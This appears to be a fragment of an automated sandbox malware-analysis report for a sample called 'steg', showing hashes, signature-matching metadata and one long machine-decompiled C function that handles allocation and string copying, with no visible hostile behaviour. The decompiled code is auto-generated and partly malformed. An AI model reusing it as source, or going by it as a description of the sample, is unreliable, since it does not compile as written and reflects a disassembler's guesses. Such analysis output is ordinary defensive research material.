                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$_memset
                                                                                                                    • String ID: YG$@qG
                                                                                                                    • API String ID: 1357608183-315953833
                                                                                                                    • Opcode ID: 0225bab2cbeed667cc2f499d711916014f966525abcdee353aa7d4adfba26b50
                                                                                                                    • Instruction ID: cec8cc4a0c145dffae28495a71e162cb787a40e74872899b417abfdc2c3b3d2b
                                                                                                                    • Opcode Fuzzy Hash: 0225bab2cbeed667cc2f499d711916014f966525abcdee353aa7d4adfba26b50
                                                                                                                    • Instruction Fuzzy Hash: AFF2CE70900641CFEB24DF18C880B6ABBF1FF44314F29896DD85A9B752D736E90ADB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FB4F07 Relevance: 11.3, APIs: 7, Instructions: 821COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 66%
                                                                                                                    			E00FB4F07(signed int _a4, signed int* _a8) {
				signed int* _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr* _v80;
				intOrPtr _v84;
				signed int _v88;
				signed int _t323;
				intOrPtr* _t327;
				signed int _t330;
				signed int* _t331;
				signed int* _t332;
				signed int _t333;
				signed char _t339;
				signed int _t340;
				signed int _t345;
				signed int _t349;
				signed int _t351;
				intOrPtr _t354;
				signed int _t359;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t367;
				signed int _t388;
				signed int _t391;
				intOrPtr _t396;
				signed int _t405;
				signed int _t408;
				intOrPtr _t413;
				signed int _t423;
				signed int _t426;
				intOrPtr _t431;
				signed int _t433;
				signed int _t434;
				signed char _t436;
				signed int _t437;
				signed int _t438;
				signed int _t440;
				signed int _t443;
				intOrPtr _t448;
				signed int _t450;
				signed int _t452;
				signed int _t455;
				signed int _t464;
				signed int _t471;
				intOrPtr* _t473;
				intOrPtr _t474;
				signed int _t477;
				void* _t478;
				signed int _t480;
				signed int _t481;
				void* _t482;
				intOrPtr* _t483;
				void* _t485;
				signed int _t486;
				intOrPtr* _t487;
				intOrPtr _t488;
				signed int _t490;
				intOrPtr _t491;
				signed int _t494;
				intOrPtr _t496;
				signed int _t497;
				signed int _t500;
				intOrPtr _t504;
				intOrPtr _t506;
				signed int _t507;
				signed int _t508;
				signed char* _t509;
				signed int _t512;
				intOrPtr* _t514;
				signed int _t516;
				signed int _t518;
				intOrPtr* _t520;
				intOrPtr _t522;
				signed int _t523;
				void* _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t532;
				signed int _t533;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t539;
				signed int _t540;
				void* _t542;
				intOrPtr* _t543;
				signed int _t544;
				signed int _t545;
				void* _t546;
				void* _t547;
				void* _t548;
				void* _t550;
				void* _t551;
				void* _t552;
				void* _t553;

				_t505 = _a4;
				_t483 =  *((intOrPtr*)(_a4 + 8));
				_v8 = _t483;
				_t531 =  *_t483;
				_v12 = _t531;
				if( *((char*)(_t531 + 0x1e)) == 0) {
					_t514 = _a8;
					_t471 =  *(_t514 + 8);
					_v20 = _t471;
					__eflags = _t471;
					if(_t471 == 0) {
						L206:
						return 1;
					} else {
						_t323 =  *(_t514 + 6) & 0x0000ffff;
						__eflags = _t323 & 0x00000010;
						if((_t323 & 0x00000010) != 0) {
							goto L206;
						} else {
							 *(_t514 + 6) = _t323 | 0x00000010;
							_v52 =  *_t514;
							E00FD1357(_t483, _t471);
							_t327 = _t471 + 8;
							_v80 = _t327;
							_t473 = _t327;
							_t516 = 0;
							_t547 = _t546 + 8;
							_v60 = 0;
							__eflags = 0 -  *_v20;
							if(0 >=  *_v20) {
								L23:
								_t474 = _v12;
								__eflags =  *((char*)(_t474 + 0x1e));
								if( *((char*)(_t474 + 0x1e)) != 0) {
									goto L205;
								} else {
									_t330 = E00FE1BE7(_v8, _a8);
									_t548 = _t547 + 8;
									__eflags = _t330;
									if(_t330 != 0) {
										goto L205;
									} else {
										_t331 = _v52;
										_t485 = 0;
										_t518 =  *_t331;
										__eflags = _t518;
										if(_t518 > 0) {
											_t512 = _t331[3];
											while(1) {
												_t543 =  *_t512;
												_t448 =  *_t543;
												__eflags = _t448 - 0x71;
												if(_t448 == 0x71) {
													break;
												}
												__eflags = _t448 - 0x76;
												if(_t448 != 0x76) {
													L30:
													_t485 = _t485 + 1;
													_t512 = _t512 + 0x14;
													__eflags = _t485 - _t518;
													if(_t485 < _t518) {
														continue;
													}
												} else {
													__eflags =  *((char*)( *((intOrPtr*)(_t543 + 0xc)))) - 0x71;
													if( *((char*)( *((intOrPtr*)(_t543 + 0xc)))) != 0x71) {
														goto L30;
													}
												}
												break;
											}
											_t331 = _v52;
										}
										__eflags = _t485 - _t518;
										if(_t485 >= _t518) {
											_t332 = _a8;
										} else {
											_t486 = _t331[3];
											_t532 = 0;
											_v88 = _t486;
											_t339 =  *( *_v8 + 0xc);
											_v28 = 0;
											__eflags = _t339 & 0x00000020;
											if((_t339 & 0x00000020) == 0) {
												L35:
												_v60 = _t532;
											} else {
												_v60 = 1;
												__eflags = _t339 & 0x00000040;
												if((_t339 & 0x00000040) != 0) {
													goto L35;
												}
											}
											_t340 = 0;
											_v76 = 0;
											__eflags = _t518;
											if(_t518 > 0) {
												do {
													_t520 = _t486 + (_t340 + _t340 * 4) * 4;
													_t487 =  *_t520;
													_t506 =  *_t487;
													__eflags = _t506 - 0x71;
													if(_t506 == 0x71) {
														L44:
														_v72 = 0;
														__eflags = _t506 - 0x76;
														if(_t506 != 0x76) {
															_t533 = 0;
															__eflags = 0;
														} else {
															_t533 =  *( *((intOrPtr*)(_t487 + 8)) + 4);
														}
														_t488 = _v80;
														_t507 = 0;
														_v24 = _t533;
														_v32 = 0;
														_v48 = _t488;
														__eflags = 0 -  *_v20;
														if(0 >=  *_v20) {
															L195:
															_t345 = _v24;
															__eflags = _t345;
															if(_t345 == 0) {
																_push(0x478438);
																_push(_v8);
																E00FC0607();
																_t548 = _t548 + 8;
															} else {
																E00FC0607(_v8, 0x478424, _t345);
																_t548 = _t548 + 0xc;
															}
														} else {
															while(1) {
																_t349 =  *(_t488 + 8);
																_t522 =  *((intOrPtr*)(_t488 + 0xc));
																_v84 = _t522;
																_v44 = _t349;
																__eflags = _t349;
																if(_t349 == 0) {
																	_t349 =  *(_t522 + 4);
																	_v44 = _t349;
																}
																__eflags =  *((char*)(_t474 + 0x1e));
																if( *((char*)(_t474 + 0x1e)) != 0) {
																	break;
																}
																__eflags = _t533;
																if(_t533 == 0) {
																	L59:
																	_t351 = 0;
																	_v72 = 1;
																	_v68 = 0;
																	__eflags =  *(_t522 + 0xc);
																	if( *(_t522 + 0xc) > 0) {
																		do {
																			_t490 = _t351 + _t351 * 2;
																			_t354 =  *((intOrPtr*)(_t522 + 0x10));
																			__eflags =  *((char*)(_t354 + 0x17 + _t490 * 8));
																			_t523 =  *(_t354 + _t490 * 8);
																			_v16 = _t523;
																			if( *((char*)(_t354 + 0x17 + _t490 * 8)) == 0) {
																				__eflags = _t507;
																				if(_t507 <= 0) {
																					L67:
																					__eflags = _t523;
																					if(_t523 == 0) {
																						_t535 = 0;
																						__eflags = 0;
																					} else {
																						__eflags =  *_t523;
																						_t540 = _t523;
																						if( *_t523 != 0) {
																							do {
																								_t540 = _t540 + 1;
																								__eflags =  *_t540;
																							} while ( *_t540 != 0);
																						}
																						_t535 = _t540 - _t523 & 0x3fffffff;
																					}
																					__eflags =  *((char*)(_t474 + 0x1e));
																					_t146 = _t535 + 0x31; // 0x31
																					_t524 = _t146;
																					if( *((char*)(_t474 + 0x1e)) == 0) {
																						__eflags =  *((char*)(_t474 + 0xda));
																						if( *((char*)(_t474 + 0xda)) == 0) {
																							L79:
																							_t159 = _t524 - 1; // 0x30
																							__eflags = _t159 - 0x7ffffefe;
																							if(_t159 > 0x7ffffefe) {
																								_t477 = 0;
																								__eflags = 0;
																								_a4 = 0;
																								_v36 = 0;
																								goto L91;
																							} else {
																								__eflags =  *0x481808;
																								if( *0x481808 == 0) {
																									_t477 =  *0x481820(_t524);
																									_v36 = _t477;
																									goto L87;
																								} else {
																									_t423 =  *0x481910;
																									__eflags = _t423;
																									if(_t423 != 0) {
																										 *0x481850(_t423);
																										_t548 = _t548 + 4;
																									}
																									E00FAB537(_t507, _t524,  &_v36);
																									_t426 =  *0x481910;
																									_t548 = _t548 + 8;
																									__eflags = _t426;
																									if(_t426 == 0) {
																										_t477 = _v36;
																									} else {
																										 *0x481858(_t426);
																										_t477 = _v36;
																										L87:
																										_t548 = _t548 + 4;
																									}
																								}
																								_a4 = _t477;
																								__eflags = _t477;
																								if(_t477 != 0) {
																									goto L93;
																								} else {
																									L91:
																									 *((char*)(_v12 + 0x1e)) = 1;
																									goto L92;
																								}
																							}
																						} else {
																							__eflags = _t524 - ( *(_t474 + 0xd8) & 0x0000ffff);
																							if(_t524 > ( *(_t474 + 0xd8) & 0x0000ffff)) {
																								goto L79;
																							} else {
																								_t477 =  *(_t474 + 0xe4);
																								_a4 = _t477;
																								__eflags = _t477;
																								if(_t477 == 0) {
																									goto L79;
																								} else {
																									_t496 = _v12;
																									 *((intOrPtr*)(_t496 + 0xdc)) =  *((intOrPtr*)(_t496 + 0xdc)) + 1;
																									 *((intOrPtr*)(_t496 + 0xe4)) =  *_t477;
																									_t431 =  *((intOrPtr*)(_t496 + 0xdc));
																									__eflags = _t431 -  *((intOrPtr*)(_t496 + 0xe0));
																									if(_t431 >  *((intOrPtr*)(_t496 + 0xe0))) {
																										 *((intOrPtr*)(_t496 + 0xe0)) = _t431;
																									}
																									L92:
																									__eflags = _t477;
																									if(_t477 != 0) {
																										L93:
																										 *((short*)(_t477 + 0x1e)) = E00FE7C87(_t477, 0, _t524) | 0xffffffff;
																										_t170 = _t535 + 1; // 0x1
																										_t548 = _t548 + 0xc;
																										 *_t477 = 0x1a;
																										__eflags = _t170;
																										if(_t170 != 0) {
																											_t175 = _t477 + 0x30; // 0x30
																											 *((intOrPtr*)(_t477 + 4)) = _t175;
																											E00FE7337(_t175, _v16, _t535);
																											_t548 = _t548 + 0xc;
																											 *((char*)(_t535 +  *((intOrPtr*)(_t477 + 4)))) = 0;
																										} else {
																											 *(_t477 + 2) =  *(_t477 + 2) | 0x00000800;
																											 *((intOrPtr*)(_t477 + 4)) = 0;
																										}
																										 *((intOrPtr*)(_t477 + 0x2c)) = 1;
																									}
																								}
																							}
																						}
																					} else {
																						_t477 = 0;
																						_a4 = 0;
																					}
																					_v64 = 0;
																					__eflags = _v60;
																					if(_v60 != 0) {
																						L99:
																						_t359 = _v44;
																						__eflags = _t359;
																						if(_t359 == 0) {
																							_t525 = 0;
																							__eflags = 0;
																						} else {
																							__eflags =  *_t359;
																							_t528 = _t359;
																							if( *_t359 != 0) {
																								do {
																									_t528 = _t528 + 1;
																									__eflags =  *_t528;
																								} while ( *_t528 != 0);
																							}
																							_t525 = _t528 - _t359 & 0x3fffffff;
																						}
																						_t491 = _v12;
																						_t185 = _t525 + 0x31; // 0x31
																						_t478 = _t185;
																						__eflags =  *((char*)(_t491 + 0x1e));
																						if( *((char*)(_t491 + 0x1e)) == 0) {
																							__eflags =  *((char*)(_t491 + 0xda));
																							if( *((char*)(_t491 + 0xda)) == 0) {
																								L111:
																								_t196 = _t478 - 1; // 0x30
																								__eflags = _t196 - 0x7ffffefe;
																								if(_t196 > 0x7ffffefe) {
																									_t536 = 0;
																									__eflags = 0;
																									_v40 = 0;
																									goto L123;
																								} else {
																									__eflags =  *0x481808;
																									if( *0x481808 == 0) {
																										_t536 =  *0x481820(_t478);
																										_v40 = _t536;
																										goto L119;
																									} else {
																										_t405 =  *0x481910;
																										__eflags = _t405;
																										if(_t405 != 0) {
																											 *0x481850(_t405);
																											_t548 = _t548 + 4;
																										}
																										E00FAB537(_t507, _t478,  &_v40);
																										_t408 =  *0x481910;
																										_t548 = _t548 + 8;
																										__eflags = _t408;
																										if(_t408 == 0) {
																											_t536 = _v40;
																										} else {
																											 *0x481858(_t408);
																											_t536 = _v40;
																											L119:
																											_t548 = _t548 + 4;
																										}
																									}
																									__eflags = _t536;
																									if(_t536 != 0) {
																										goto L125;
																									} else {
																										_t491 = _v12;
																										L123:
																										 *((char*)(_t491 + 0x1e)) = 1;
																										goto L124;
																									}
																								}
																							} else {
																								__eflags = _t478 - ( *(_t491 + 0xd8) & 0x0000ffff);
																								if(_t478 > ( *(_t491 + 0xd8) & 0x0000ffff)) {
																									goto L111;
																								} else {
																									_t536 =  *(_t491 + 0xe4);
																									__eflags = _t536;
																									if(_t536 == 0) {
																										goto L111;
																									} else {
																										 *((intOrPtr*)(_t491 + 0xdc)) =  *((intOrPtr*)(_t491 + 0xdc)) + 1;
																										 *(_t491 + 0xe4) =  *_t536;
																										_t413 =  *((intOrPtr*)(_t491 + 0xdc));
																										__eflags = _t413 -  *((intOrPtr*)(_t491 + 0xe0));
																										if(_t413 >  *((intOrPtr*)(_t491 + 0xe0))) {
																											 *((intOrPtr*)(_t491 + 0xe0)) = _t413;
																										}
																										L124:
																										__eflags = _t536;
																										if(_t536 != 0) {
																											L125:
																											 *((short*)(_t536 + 0x1e)) = E00FE7C87(_t536, 0, _t478) | 0xffffffff;
																											_t205 = _t525 + 1; // 0x1
																											_t548 = _t548 + 0xc;
																											 *_t536 = 0x1a;
																											__eflags = _t205;
																											if(_t205 != 0) {
																												_t210 = _t536 + 0x30; // 0x30
																												 *((intOrPtr*)(_t536 + 4)) = _t210;
																												E00FE7337(_t210, _v44, _t525);
																												_t548 = _t548 + 0xc;
																												 *((char*)(_t525 +  *((intOrPtr*)(_t536 + 4)))) = 0;
																											} else {
																												 *(_t536 + 2) =  *(_t536 + 2) | 0x00000800;
																												 *((intOrPtr*)(_t536 + 4)) = 0;
																											}
																											 *((intOrPtr*)(_t536 + 0x2c)) = 1;
																										}
																									}
																								}
																							}
																						} else {
																							_t536 = 0;
																						}
																						_t480 =  *_v8;
																						__eflags = _t480;
																						if(_t480 == 0) {
																							L137:
																							__eflags =  *0x481808;
																							if( *0x481808 == 0) {
																								_t526 =  *0x481820(0x30);
																								_v56 = _t526;
																								goto L144;
																							} else {
																								_t388 =  *0x481910;
																								__eflags = _t388;
																								if(_t388 != 0) {
																									 *0x481850(_t388);
																									_t548 = _t548 + 4;
																								}
																								E00FAB537(_t507, 0x30,  &_v56);
																								_t391 =  *0x481910;
																								_t548 = _t548 + 8;
																								__eflags = _t391;
																								if(_t391 == 0) {
																									_t526 = _v56;
																								} else {
																									 *0x481858(_t391);
																									_t526 = _v56;
																									L144:
																									_t548 = _t548 + 4;
																								}
																							}
																							__eflags = _t526;
																							if(_t526 != 0) {
																								goto L149;
																							} else {
																								__eflags = _t480;
																								if(_t480 != 0) {
																									 *((char*)(_t480 + 0x1e)) = 1;
																								}
																								goto L148;
																							}
																						} else {
																							__eflags =  *((char*)(_t480 + 0x1e));
																							if( *((char*)(_t480 + 0x1e)) == 0) {
																								__eflags =  *((char*)(_t480 + 0xda));
																								if( *((char*)(_t480 + 0xda)) == 0) {
																									goto L137;
																								} else {
																									__eflags = 0x30 -  *((intOrPtr*)(_t480 + 0xd8));
																									if(0x30 >  *((intOrPtr*)(_t480 + 0xd8))) {
																										goto L137;
																									} else {
																										_t526 =  *(_t480 + 0xe4);
																										__eflags = _t526;
																										if(_t526 == 0) {
																											goto L137;
																										} else {
																											 *((intOrPtr*)(_t480 + 0xdc)) =  *((intOrPtr*)(_t480 + 0xdc)) + 1;
																											 *(_t480 + 0xe4) =  *_t526;
																											_t396 =  *((intOrPtr*)(_t480 + 0xdc));
																											__eflags = _t396 -  *((intOrPtr*)(_t480 + 0xe0));
																											if(_t396 >  *((intOrPtr*)(_t480 + 0xe0))) {
																												 *((intOrPtr*)(_t480 + 0xe0)) = _t396;
																											}
																											L148:
																											__eflags = _t526;
																											if(_t526 != 0) {
																												L149:
																												_t362 = E00FE7C87(_t526, 0, 0x30);
																												_t548 = _t548 + 0xc;
																												_t363 = _t362 | 0xffffffff;
																												__eflags = _t363;
																												 *_t526 = 0x76;
																												 *(_t526 + 0x1e) = _t363;
																												 *((intOrPtr*)(_t526 + 0x2c)) = 1;
																											}
																										}
																									}
																								}
																							} else {
																								_t526 = 0;
																							}
																						}
																						_t481 =  *_v8;
																						__eflags = _t526;
																						if(_t526 != 0) {
																							_t364 = _a4;
																							__eflags = _t364;
																							if(_t364 != 0) {
																								 *(_t526 + 0xc) = _t364;
																								__eflags =  *(_t364 + 2) & 0x00000100;
																								if(( *(_t364 + 2) & 0x00000100) != 0) {
																									_t258 = _t526 + 2;
																									 *_t258 =  *(_t526 + 2) | 0x00000100;
																									__eflags =  *_t258;
																									 *((intOrPtr*)(_t526 + 0x14)) =  *((intOrPtr*)(_t364 + 0x14));
																								}
																							}
																							__eflags = _t536;
																							if(_t536 != 0) {
																								 *(_t526 + 8) = _t536;
																								__eflags =  *(_t536 + 2) & 0x00000100;
																								if(( *(_t536 + 2) & 0x00000100) != 0) {
																									_t266 = _t526 + 2;
																									 *_t266 =  *(_t526 + 2) | 0x00000100;
																									__eflags =  *_t266;
																									 *((intOrPtr*)(_t526 + 0x14)) =  *((intOrPtr*)(_t536 + 0x14));
																								}
																							}
																							E00FA6B67(0x100, _t526);
																							goto L172;
																						} else {
																							__eflags = _t536;
																							if(_t536 != 0) {
																								E00FC12E7(_t481, _t536);
																								_t548 = _t548 + 8;
																								__eflags =  *(_t536 + 2) & 0x00008000;
																								if(( *(_t536 + 2) & 0x00008000) == 0) {
																									__eflags = _t481;
																									if(_t481 == 0) {
																										L157:
																										E00F97247(_t536);
																										_t548 = _t548 + 4;
																									} else {
																										__eflags = _t536 -  *((intOrPtr*)(_t481 + 0xe8));
																										if(_t536 <  *((intOrPtr*)(_t481 + 0xe8))) {
																											goto L157;
																										} else {
																											__eflags = _t536 -  *((intOrPtr*)(_t481 + 0xec));
																											if(_t536 >=  *((intOrPtr*)(_t481 + 0xec))) {
																												goto L157;
																											} else {
																												 *_t536 =  *(_t481 + 0xe4);
																												 *((intOrPtr*)(_t481 + 0xdc)) =  *((intOrPtr*)(_t481 + 0xdc)) - 1;
																												 *(_t481 + 0xe4) = _t536;
																											}
																										}
																									}
																								}
																							}
																							_t539 = _a4;
																							__eflags = _t539;
																							if(_t539 != 0) {
																								E00FC12E7(_t481, _t539);
																								_t548 = _t548 + 8;
																								__eflags =  *(_t539 + 2) & 0x00008000;
																								if(( *(_t539 + 2) & 0x00008000) == 0) {
																									__eflags = _t481;
																									if(_t481 == 0) {
																										L164:
																										E00F97247(_t539);
																										L172:
																										_t548 = _t548 + 4;
																									} else {
																										__eflags = _t539 -  *((intOrPtr*)(_t481 + 0xe8));
																										if(_t539 <  *((intOrPtr*)(_t481 + 0xe8))) {
																											goto L164;
																										} else {
																											__eflags = _t539 -  *((intOrPtr*)(_t481 + 0xec));
																											if(_t539 >=  *((intOrPtr*)(_t481 + 0xec))) {
																												goto L164;
																											} else {
																												 *_t539 =  *(_t481 + 0xe4);
																												 *((intOrPtr*)(_t481 + 0xdc)) =  *((intOrPtr*)(_t481 + 0xdc)) - 1;
																												 *(_t481 + 0xe4) = _t539;
																											}
																										}
																									}
																								}
																							}
																						}
																						__eflags = _v60;
																						_t477 = _t526;
																						if(_v60 == 0) {
																							goto L175;
																						} else {
																							_push(_v16);
																							_t527 = E00FC9197(_v12, 0x478310, _v44);
																							_t548 = _t548 + 0x10;
																							_v16 = _t527;
																							_v64 = _t527;
																						}
																					} else {
																						__eflags =  *_v20 - 1;
																						if( *_v20 <= 1) {
																							L175:
																							_t527 = _v16;
																						} else {
																							goto L99;
																						}
																					}
																					_t367 = E00FC2F07(_v8, _v28, _t477);
																					_t548 = _t548 + 0xc;
																					_t508 = _t367;
																					_v28 = _t508;
																					_t537 = _t527;
																					__eflags = _t527;
																					if(_t527 != 0) {
																						__eflags =  *_t527;
																						if( *_t527 != 0) {
																							do {
																								_t537 = _t537 + 1;
																								__eflags =  *_t537;
																							} while ( *_t537 != 0);
																						}
																						_t537 = _t537 - _t527 & 0x3fffffff;
																						__eflags = _t537;
																					}
																					__eflags = _t508;
																					if(_t508 != 0) {
																						_t482 =  *((intOrPtr*)(_t508 + 0xc)) + ( *_t508 +  *_t508 * 4) * 4;
																						__eflags = _t527;
																						if(_t527 != 0) {
																							_t527 = E00FBE727( *_v8, _t537 + 1);
																							_t548 = _t548 + 8;
																							__eflags = _t527;
																							if(_t527 != 0) {
																								E00FE7337(_t527, _v16, _t537);
																								_t548 = _t548 + 0xc;
																								 *((char*)(_t527 + _t537)) = 0;
																							}
																						}
																						 *(_t482 - 0x10) = _t527;
																					}
																					_t494 = _v64;
																					_t474 = _v12;
																					__eflags = _t494;
																					if(_t494 == 0) {
																						L190:
																						E00F97247(_t494);
																						_t548 = _t548 + 4;
																					} else {
																						__eflags = _t494 -  *((intOrPtr*)(_t474 + 0xe8));
																						if(_t494 <  *((intOrPtr*)(_t474 + 0xe8))) {
																							goto L190;
																						} else {
																							__eflags = _t494 -  *((intOrPtr*)(_t474 + 0xec));
																							if(_t494 >=  *((intOrPtr*)(_t474 + 0xec))) {
																								goto L190;
																							} else {
																								 *_t494 =  *(_t474 + 0xe4);
																								 *((intOrPtr*)(_t474 + 0xdc)) =  *((intOrPtr*)(_t474 + 0xdc)) - 1;
																								 *(_t474 + 0xe4) = _t494;
																							}
																						}
																					}
																				} else {
																					__eflags = _t533;
																					if(_t533 != 0) {
																						goto L67;
																					} else {
																						_t497 = _v20;
																						_t433 = _t507 * 8 - _t507;
																						__eflags =  *(_t497 + 0x1d + _t433 * 8) & 0x00000004;
																						_t542 = _t497 + _t433 * 8;
																						if(( *(_t497 + 0x1d + _t433 * 8) & 0x00000004) == 0) {
																							L66:
																							_t434 = E00FC6C97(_t433,  *((intOrPtr*)(_t542 + 0x28)), _t523);
																							_t548 = _t548 + 8;
																							__eflags = _t434;
																							if(_t434 < 0) {
																								goto L67;
																							}
																						} else {
																							_t433 = E00FA3C47( *((intOrPtr*)(_t542 - 0x24)), _t523);
																							_t548 = _t548 + 8;
																							__eflags = _t433;
																							if(_t433 < 0) {
																								goto L66;
																							}
																						}
																					}
																				}
																			}
																			_t522 = _v84;
																			_t507 = _v32;
																			_t533 = _v24;
																			_t351 = _v68 + 1;
																			_v68 = _t351;
																			__eflags = _t351 -  *(_t522 + 0xc);
																		} while (_t351 <  *(_t522 + 0xc));
																		_t488 = _v48;
																	}
																} else {
																	_t509 = _t349;
																	_t436 =  *_v24;
																	__eflags = _t436;
																	if(_t436 != 0) {
																		while(1) {
																			_t500 =  *_t509 & 0x000000ff;
																			_t440 = _t436 & 0x000000ff;
																			__eflags =  *((intOrPtr*)(_t440 + 0x472f30)) -  *((intOrPtr*)(_t500 + 0x472f30));
																			if( *((intOrPtr*)(_t440 + 0x472f30)) !=  *((intOrPtr*)(_t500 + 0x472f30))) {
																				goto L57;
																			}
																			_t436 =  *(_t533 + 1);
																			_t533 = _t533 + 1;
																			_t509 =  &(_t509[1]);
																			__eflags = _t436;
																			if(_t436 != 0) {
																				continue;
																			}
																			goto L57;
																		}
																	}
																	L57:
																	_t437 =  *_t533 & 0x000000ff;
																	_t438 =  *_t509 & 0x000000ff;
																	_t507 = _v32;
																	__eflags = ( *(_t437 + 0x472f30) & 0x000000ff) == ( *(_t438 + 0x472f30) & 0x000000ff);
																	_t488 = _v48;
																	if(( *(_t437 + 0x472f30) & 0x000000ff) == ( *(_t438 + 0x472f30) & 0x000000ff)) {
																		_t533 = _v24;
																		goto L59;
																	}
																}
																_t507 = _t507 + 1;
																_t488 = _t488 + 0x38;
																_v32 = _t507;
																_v48 = _t488;
																__eflags = _t507 -  *_v20;
																if(_t507 <  *_v20) {
																	_t533 = _v24;
																	continue;
																}
																break;
															}
															__eflags = _v72;
															if(_v72 == 0) {
																goto L195;
															}
														}
													} else {
														__eflags = _t506 - 0x76;
														if(_t506 != 0x76) {
															L41:
															_t443 = E00FC2F07(_v8, _t532, _t487);
															_t548 = _t548 + 0xc;
															_v28 = _t443;
															__eflags = _t443;
															if(_t443 != 0) {
																 *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xc)) + ( *_t443 +  *_t443 * 4) * 4 - 0x10)) =  *((intOrPtr*)(_t520 + 4));
																 *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + ( *_t443 +  *_t443 * 4) * 4 - 0xc)) =  *((intOrPtr*)(_t520 + 8));
																 *((intOrPtr*)(_t520 + 4)) = 0;
																 *((intOrPtr*)(_t520 + 8)) = 0;
															}
															 *_t520 = 0;
														} else {
															__eflags =  *((char*)( *((intOrPtr*)(_t487 + 0xc)))) - 0x71;
															if( *((char*)( *((intOrPtr*)(_t487 + 0xc)))) == 0x71) {
																goto L44;
															} else {
																goto L41;
															}
														}
													}
													_t532 = _v28;
													_t340 = _v76 + 1;
													__eflags = _t340 -  *_v52;
													_t486 = _v88;
													_v76 = _t340;
												} while (_t340 <  *_v52);
											}
											E00FC3017(_t474, _v52);
											_t332 = _a8;
											_t548 = _t548 + 8;
											 *_t332 = _t532;
										}
										_t333 =  *_t332;
										__eflags = _t333;
										if(_t333 != 0) {
											__eflags =  *_t333 -  *((intOrPtr*)(_t474 + 0x50));
											if( *_t333 >  *((intOrPtr*)(_t474 + 0x50))) {
												_push(0x47844c);
												_push(_v8);
												E00FC0607();
											}
										}
										__eflags = 0;
										return 0;
									}
								}
							} else {
								while(1) {
									__eflags =  *(_t473 + 0xc);
									if( *(_t473 + 0xc) != 0) {
										goto L206;
									}
									_t450 =  *(_t473 + 4);
									__eflags = _t450;
									if(_t450 != 0) {
										_t544 = E00FC8FF7(_v8, 0, _t450,  *_t473);
										_t550 = _t547 + 0x10;
										 *(_t473 + 0xc) = _t544;
										__eflags = _t544;
										if(_t544 == 0) {
											goto L205;
										} else {
											 *((short*)(_t544 + 0x20)) =  *((short*)(_t544 + 0x20)) + 1;
											__eflags =  *(_t544 + 0x1c);
											if(__eflags != 0) {
												L21:
												_t452 = E00FDF1A7(__eflags, _v8, _t544);
												_t551 = _t550 + 8;
												__eflags = _t452;
												if(_t452 != 0) {
													goto L205;
												} else {
													_t531 = _v12;
													 *(_t473 + 0x10) = E00FD0E17(_v12,  *(_t544 + 0x1c), _t452);
													E00FDFC77(_a4, _t453);
													_t550 = _t551 + 0x14;
													goto L15;
												}
											} else {
												__eflags =  *(_t544 + 0x22) & 0x00000010;
												if(__eflags == 0) {
													goto L14;
												} else {
													goto L21;
												}
											}
										}
									} else {
										_t530 =  *(_t473 + 0x10);
										E00FDFC77(_t505, _t530);
										_t545 = E00FBE727(_t531, 0x50);
										_t552 = _t547 + 0x10;
										__eflags = _t545;
										if(_t545 != 0) {
											E00FE7C87(_t545, 0, 0x50);
											_t552 = _t552 + 0xc;
										}
										 *(_t473 + 0xc) = _t545;
										__eflags = _t545;
										if(_t545 == 0) {
											L205:
											return 2;
										} else {
											_t504 = _v12;
											__eflags =  *(_t504 + 0xda);
											_t461 =  !=  ? _t504 : 0;
											 *_t545 =  !=  ? _t504 : 0;
											 *((short*)(_t545 + 0x20)) = 1;
											 *((intOrPtr*)(_t545 + 4)) = E00FC9197(_t504, 0x478410, _t545);
											_t464 =  *(_t530 + 0x1c);
											_t553 = _t552 + 0xc;
											__eflags = _t464;
											while(_t464 != 0) {
												_t530 = _t464;
												_t464 =  *(_t464 + 0x1c);
												__eflags = _t464;
											}
											_t28 = _t545 + 0x10; // 0x10
											_t29 = _t545 + 0xc; // 0xc
											E00FB4B27(_v8,  *_t530, _t29, _t28);
											_t516 = _v60;
											_t550 = _t553 + 0x10;
											_t32 = _t545 + 0x22;
											 *_t32 =  *(_t545 + 0x22) | 0x00000002;
											__eflags =  *_t32;
											 *((intOrPtr*)(_t545 + 8)) = 0xffffffff;
											L14:
											_t531 = _v12;
											L15:
											_t455 = E00FC6F47(_v8, _t473);
											_t547 = _t550 + 8;
											__eflags = _t455;
											if(_t455 != 0) {
												goto L205;
											} else {
												_t516 = _t516 + 1;
												_t473 = _t473 + 0x38;
												_v60 = _t516;
												__eflags = _t516 -  *_v20;
												if(_t516 >=  *_v20) {
													goto L23;
												} else {
													_t505 = _a4;
													continue;
												}
											}
										}
									}
									goto L207;
								}
								goto L206;
							}
						}
					}
				} else {
					return 2;
				}
				L207:
			}




















































































































                                                                                                                    0x00fb4f0d
                                                                                                                    0x00fb4f11
                                                                                                                    0x00fb4f14
                                                                                                                    0x00fb4f17
                                                                                                                    0x00fb4f19
                                                                                                                    0x00fb4f20
                                                                                                                    0x00fb4f2e
                                                                                                                    0x00fb4f31
                                                                                                                    0x00fb4f34
                                                                                                                    0x00fb4f37
                                                                                                                    0x00fb4f39
                                                                                                                    0x00fb58c1
                                                                                                                    0x00fb58cc
                                                                                                                    0x00fb4f3f
                                                                                                                    0x00fb4f3f
                                                                                                                    0x00fb4f43
                                                                                                                    0x00fb4f45
                                                                                                                    0x00000000
                                                                                                                    0x00fb4f4b
                                                                                                                    0x00fb4f4e
